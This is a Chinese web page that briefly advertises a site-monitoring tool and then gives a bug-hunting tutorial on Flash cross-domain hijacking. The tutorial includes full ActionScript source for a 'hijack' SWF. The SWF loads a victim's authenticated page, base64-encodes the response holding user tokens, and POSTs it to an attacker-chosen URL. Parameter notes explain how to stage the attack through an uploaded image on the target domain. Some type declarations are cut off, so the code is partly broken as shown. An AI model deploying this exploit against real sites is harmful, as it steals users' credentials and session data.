flash劫持问题如何可以检测?
通过什么样的办法检测flash是否被劫持?
iis7网站监控
网站的劫持、污染、flash劫持可检测。
Flash 劫持
当我们在挖src漏洞的时候,找到一个接口或者一个页面response内容,存在用户的token或者用户唯一标识的信息的时候,着要访问www..com/crossdomain.xml
存在以上的情况,着要在.com找到一个可以上传图片的就可以进行劫持用户权限。
hijack源码:
package {
import flash.display.Sprite;
import flash.events.Event;
import flash.net.;
import flash.utils.ByteArray;
import flash.text.TextField;
public class hijack extends Sprite
{
private static const _encodeChars:Vector.
public function hijack()
{
var params:Object=root.loaderInfo.parameters;
var jpg:URLRequest = new URLRequest(params.jpg);
jpg.method = URLRequestMethod.GET;
sendToURL(jpg);
var request:URLRequest = new URLRequest(params.get);
request.method = URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event):void{
var data:String=(loader.data);
var postURLrequest:URLRequest = new URLRequest(params.post);
postURLrequest.method = URLRequestMethod.POST;
var postdata:Object = new Array();
postdata[0]=encode(data);
postURLrequest.data = postdata[0];
sendToURL(postURLrequest);
}
loader.load(request);
}
public static function encode(data:String):String {
var bytes:ByteArray = new ByteArray();
bytes.writeUTFBytes(data);
return encodeByteArray(bytes);
}
public static function encodeByteArray(data:ByteArray):String {
var out:ByteArray = new ByteArray();
//Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
out.length = (2 + data.length - ((data.length + 2) % 3))
var i:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:uint; //read (3) character AND write (4) characters
var outPos:int = 0;
while(i < len) {
//Read 3 Characters (8bit * 3 = 24 bits)
c = data[int(i++)] << 16 | data[int(i++)] << 8 | data[int(i++)];
out[int(outPos++)] = _encodeChars[int(c >>> 18)];
out[int(outPos++)] = _encodeChars[int(c >>> 12 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c >>> 6 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c & 0x3f)];
}
//Need two "=" padding
if(r == 1) {
//Read one char, write two chars, write padding
c = data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 2)];
out[int(outPos++)] = _encodeChars[int((c & 0x03) << 4)];
out[int(outPos++)] = 61;
out[int(outPos++)] = 61;
}
//Need one "=" padding
else if(r == 2) {
c = data[int(i++)] << 8 | data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 10)];
out[int(outPos++)] = _encodeChars[int(c >>> 4 & 0x3f)];
out[int(outPos++)] = _encodeChars[int((c & 0x0f) << 2)];
out[int(outPos++)] = 61;
}
return out.readUTFBytes(out.length);
}
private static function _initEncoreChar():Vector.
var encodeChars:Vector.
// We could push the number directly
// but I think it's nice to see the characters (with no overhead on encode/decode)
var chars:String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
for(var i:int = 0; i<64; i++) {
encodeChars[i] = chars.charCodeAt(i);
}
return encodeChars;
}
}
}
参数说明:
jpg:域下的图片(为了优先加载crossdomain.xml,否则劫持的接口加载太慢会导致无法劫持)
get:劫持的接口或者页面
post:接收劫持过来的页面为base64传输
